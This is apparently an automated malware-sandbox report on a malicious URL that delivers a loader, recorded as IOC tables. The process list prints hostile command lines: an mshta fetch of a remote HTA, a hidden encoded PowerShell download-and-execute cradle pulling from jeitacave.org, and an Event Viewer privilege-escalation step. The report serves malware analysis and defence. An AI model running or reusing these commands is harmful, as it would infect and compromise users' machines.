Field | Value |
---|---|
URL | http://alfcck.xyz |
Full analysis | https://app.any.run/tasks/108b06cd-d1be-4099-b682-feb75ed779e0 |
Verdict | Malicious activity |
Threats | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date | September 19, 2019, 06:07:16 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MD5 | A1F5212F5EA2AEA6E14BEFD77F43133D |
SHA1 | C64D1E6420DF128789186608494D60E5B3312377 |
SHA256 | 1CABD2C2BE329625A88F8DA578D5FCF9179A6022372953646B328D04E22B6D15 |
SSDEEP | 3:N1Kffkdcf:CnUcf |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2764 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://alfcck.xyz" | C:\Program Files\Internet Explorer\iexplore.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Internet Explorer; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
3272 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2764 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | | iexplore.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Internet Explorer; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
3136 | mshta http://jeitacave.org/hta.hta | C:\Windows\system32\mshta.exe | | iexplore.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
3160 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
504 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Event Viewer Snapin Launcher; Exit code: 3221226540; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3988 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Event Viewer Snapin Launcher; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
2672 | "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | C:\Windows\system32\mmc.exe | | Eventvwr.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft Management Console; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3716 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand [encoded command not preserved in this capture] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3060 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\Low\zp3qd0ym.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Visual C# Command Line Compiler; Exit code: 0; Version: 8.0.50727.4927 (NetFXspW7.050727-4900) |
2640 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\Low\RESA9F1.tmp" "c:\Users\admin\AppData\Local\Temp\Low\CSCA9F0.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Microsoft® Resource File To COFF Object Conversion Utility; Exit code: 0; Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2764 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | — | — |
2764 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | — |
3060 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\CSCA9F0.tmp | — | — | — |
3060 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\zp3qd0ym.pdb | — | — | — |
2640 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\Low\RESA9F1.tmp | — | — | — |
3060 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\zp3qd0ym.dll | — | — | — |
3060 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\zp3qd0ym.out | — | — | — |
2188 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5GRQ4O66KC581530CG5H.temp | — | — | — |
3068 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\CSCE1F8.tmp | — | — | — |
3068 | csc.exe | C:\Users\admin\AppData\Local\Temp\Low\goc5o6cd.pdb | — | — | — |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2244 | msiexec.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg | US | executable | 3.43 Mb | malicious |
3136 | mshta.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/hta.hta | US | html | 466 b | malicious |
3160 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1808132.jpg | US | executable | 81.5 Kb | malicious |
3160 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/pe.jpg | US | text | 462 Kb | malicious |
3160 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
3272 | iexplore.exe | GET | 200 | 104.24.113.108:80 | http://alfcck.xyz/ | US | html | 7.59 Kb | malicious |
3272 | iexplore.exe | GET | 200 | 104.24.113.108:80 | http://alfcck.xyz/3.htm | US | text | 452 b | malicious |
2764 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2764 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3272 | iexplore.exe | 104.24.113.108:80 | alfcck.xyz | Cloudflare Inc | US | shared |
3160 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
2244 | msiexec.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
3136 | mshta.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
alfcck.xyz | | malicious |
www.bing.com | | whitelisted |
jeitacave.org | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3272 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
3272 | iexplore.exe | Attempted User Privilege Gain | ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Percent Hex Encode |
3272 | iexplore.exe | Attempted User Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name |
3272 | iexplore.exe | Attempted User Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct Hex Encode |
3272 | iexplore.exe | Attempted Administrator Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2 |
3272 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3 |
3272 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
3136 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
3136 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3272 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774<br>*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |